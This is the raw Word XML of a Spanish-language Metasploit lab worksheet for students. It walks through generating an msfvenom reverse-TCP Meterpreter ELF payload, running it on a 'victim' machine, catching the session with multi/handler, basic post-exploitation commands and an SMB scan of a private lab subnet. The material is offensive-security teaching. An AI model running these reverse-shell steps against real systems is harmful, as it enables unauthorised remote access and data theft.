        <w:t xml:space="preserve"> para exfiltrar datos: envío automático de archivos o credenciales a otra máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AAA0C4" w14:textId="77777777" w:rsidR="00F92461" w:rsidRDefault="00F92461" w:rsidP="00296B64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03374E88" w14:textId="7EFE30FF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Generar un ejecutable malicioso (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve">) para pruebas de reverse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCC6FF9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6CF0A8FB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 xml:space="preserve">Generar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678F89F6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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p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  <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.56.10 LPORT=4444 -f elf -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08AC880C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Dar permisos de ejecución:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEBFA7E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chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> +x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40F58E36" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00296B64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:t>Copiar el archivo a la máquina víctima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275D90AD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Se crea un archivo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> listo para ejecutar y conectarse de vuelta a Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B83F545" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00000000" w:rsidP="00296B64">
      <w:r>
        <w:pict w14:anchorId="0EFB52A2">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2065294A" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00F92461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🎧</w:t>
      </w:r>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ejercicio 5 – Levantar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> y obtener acceso remoto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6188265E" w14:textId="2BF3E84D" w:rsidR="0013209F" w:rsidRPr="0013209F" w:rsidRDefault="0013209F" w:rsidP="00296B64">
      <w:r w:rsidRPr="0013209F">
        <w:t xml:space="preserve">Un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013209F">
        <w:t>handler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013209F">
        <w:t xml:space="preserve"> (gestor/escuchador) es un módulo de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013209F">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013209F">
        <w:t xml:space="preserve"> —normalmente </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013209F">
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013209F">
        <w:t>/multi/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013209F">
        <w:t>handler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013209F">
        <w:t xml:space="preserve">— que pone un puerto a la escucha y queda a la espera de que un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013209F">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013209F">
        <w:t xml:space="preserve"> (por </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013209F">
        <w:t>ejemplo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013209F">
        <w:t xml:space="preserve"> un reverse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013209F">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013209F">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="0013209F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">se conecte de vuelta. Cuando el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013209F">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013209F">
        <w:t xml:space="preserve"> conecta, el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013209F">
        <w:t>handler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013209F">
        <w:t xml:space="preserve"> crea la sesión (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013209F">
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013209F">
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013209F">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013209F">
        <w:t>) y te permite interactuar con la máquina víctima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EDD1D3" w14:textId="2CE4D33A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Configurar un “escuchador” en Kali para recibir la conexión del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3597729B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0E146DD1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 xml:space="preserve">En </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C5A5AB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 xml:space="preserve">use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>/multi/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>handler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="79717A8B" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00DC0DE9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">set PAYLOAD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11771624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LHOST 192.168.56.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20992F6F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set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBD6C53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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5C459F" w14:textId="0CDBE41F" w:rsidR="00707F22" w:rsidRDefault="00707F22" w:rsidP="00707F22">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ACB3ECB" wp14:editId="1234E12B">
            <wp:extent cx="6580952" cy="3285714"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32620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0952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6C12" w14:textId="2FE39F1F" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00296B64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:t>En la máquina víctima, ejecutar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CB9FB2" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00DC0DE9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>shell.elf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56BA2922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Cuando la víctima se conecte, listar sesiones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC8E36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sessions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC8CF65" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00296B64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:t>Conectarse a una sesión:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C91B87" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00DC0DE9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B31C89C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Acceso remoto a la víctima mediante </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE9D5D8" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00296B64">
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación:</w:t>
      </w:r>
      <w:r w:rsidRPr="00296B64">
        <w:br/>
        <w:t xml:space="preserve">El </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> se conecta a Kali (reverse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>), permitiendo ejecutar comandos, obtener información del sistema y realizar acciones controladas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BDC31E" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00000000" w:rsidP="00296B64">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="5A9DD5DC">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F33549" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00DC0DE9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5" w:themeFill="accent1" w:themeFillTint="33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🧹</w:t>
      </w:r>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ejercicio 6 – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Post-explotación</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> básica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374FEDC3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Aprender a usar comandos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> después de una explotación exitosa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10612D2E" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00296B64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pasos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0F014B" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00296B64">
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve">Una vez dentro de una sesión </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B1944F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sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C934A20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getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="398FAD01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ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57ECD11C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pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="331EFF88" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00DC0DE9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="473DCE83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  <w:t xml:space="preserve">Los alumnos exploran información del sistema comprometido y acceden a una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> básica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292843B8" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00000000" w:rsidP="00296B64">
      <w:r>
        <w:pict w14:anchorId="74223DEC">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BAB24E" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00DC0DE9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DAE9F7" w:themeFill="text2" w:themeFillTint="1A"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ejercicio 7 – Uso de módulos auxiliares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D57003F" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00296B64">
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objetivo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> Utilizar módulos de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> para recolectar información sin explotar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB16DA5" w14:textId="5D51C4C4" w:rsidR="00296B64" w:rsidRPr="0013209F" w:rsidRDefault="00296B64" w:rsidP="0013209F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E75BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo: Escaneo de SMB</w:t>
      </w:r>
      <w:r w:rsidR="006E75BD" w:rsidRPr="006E75BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. SMB (Server </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E75BD" w:rsidRPr="006E75BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006E75BD" w:rsidRPr="006E75BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Block) </w:t>
      </w:r>
      <w:r w:rsidR="006E75BD" w:rsidRPr="0013209F">
        <w:t>es un protocolo de red utilizado principalmente por los sistemas Windows para compartir archivos, carpetas, impresoras y recursos entre equipos dentro de una red local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC8170D" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00DC0DE9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smb_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19292BD6" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00AB2934" w:rsidRDefault="00296B64" w:rsidP="00DC0DE9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB2934">
        <w:t>set RHOSTS 192.168.56.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B83699D" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00DC0DE9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7780B4" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00296B64">
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado esperado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00296B64">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> muestra versiones de SMB encontradas en la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12915CF9" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00000000" w:rsidP="00296B64">
      <w:r>
        <w:pict w14:anchorId="60AE813E">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="725CEE31" w14:textId="487A1D13" w:rsidR="00EC7FBA" w:rsidRPr="00AB2934" w:rsidRDefault="00AB2934" w:rsidP="00AB2934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5" w:themeFill="accent1" w:themeFillTint="33"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2934">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejercicio 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75340978" w14:textId="7CE1FC27" w:rsidR="00AB2934" w:rsidRDefault="00AB2934">
      <w:r>
        <w:t xml:space="preserve">Quiero ver los puertos abiertos de una serie de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ips</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="250E473B" w14:textId="648E9EE9" w:rsidR="00AB2934" w:rsidRDefault="00AB2934">
      <w:r w:rsidRPr="00AB2934">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E732D55" wp14:editId="6BA44801">
            <wp:extent cx="5671185" cy="4013200"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6350"/>
            <wp:docPr id="14900882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8278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934" w:rsidSect="00AB2934">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="709" w:right="707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BD7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="92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322AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="450E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06B4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F1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A1EF0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="14381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D6251"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1DDE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32840"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C0C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52B6B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B856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D3D27"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8702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43777">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1770541652">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1575311229">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="163589911">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1496142742">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1192646016">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2074691999">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="96929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BA"/>
    <w:rsid w:val="0013209F"/>
    <w:rsid w:val="00254134"/>
    <w:rsid w:val="00296B64"/>
    <w:rsid w:val="004D0F27"/>
    <w:rsid w:val="006C06A3"/>
    <w:rsid w:val="006E75BD"/>
    <w:rsid w:val="00707F22"/>
    <w:rsid w:val="008C4F9D"/>
    <w:rsid w:val="009837C0"/>
    <w:rsid w:val="009B0A06"/>
    <w:rsid w:val="00AB2934"/>
    <w:rsid w:val="00AF72FC"/>
    <w:rsid w:val="00DC0DE9"/>
    <w:rsid w:val="00DD2BC7"/>
    <w:rsid w:val="00EC7FBA"/>
    <w:rsid w:val="00ED64A5"/>
    <w:rsid w:val="00F9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6353"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{965E4D5D-781B-4DED-A627-E03BCBA1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8</Pages>
  <Words>775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13</cp:revision>
